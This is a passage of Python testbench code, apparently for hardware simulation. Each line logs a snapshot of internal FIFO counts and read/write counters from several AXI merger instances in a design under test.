logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge2.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge2.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge2.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge200.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge200.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge200.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge200.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge200.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge200.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge200.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge201.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge201.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge201.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge201.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge201.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge201.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge201.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge202.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge202.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge202.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge202.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge202.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge202.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge202.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge202.axi_wr_4_merger.a_bcount"))
